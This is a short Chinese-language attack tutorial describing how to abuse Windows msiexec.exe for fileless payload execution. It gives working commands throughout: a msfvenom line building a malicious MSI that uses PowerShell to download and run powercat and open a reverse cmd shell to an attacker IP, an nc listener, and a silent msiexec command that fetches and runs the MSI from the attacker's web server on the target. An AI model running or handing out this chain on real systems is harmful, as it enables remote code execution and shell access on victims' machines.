msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要,一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大,我们亦可以使用其作为无文件落地的媒介,下面举例说明:
Step 1:使用Msfvenom构造一个恶意的msi程序
msfvenom -p windows/exec CMD="powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.10.131 -p 6789 -e cmd" -f msi > evil.msi
Step 2:使用python开启一个简易的web服务器用于托管msi载荷
Step 3:在【kali】上使用nc监听端口
nc -lvp 6789
Step 4:在目标主机中执行以下命令实现无文件落地执行载荷
msiexec /q /i http://192.168.10.131:8083/evil.msi
Step 5:之后再web端成功接收到请求记录,同时在NC端返回cmd命令交互
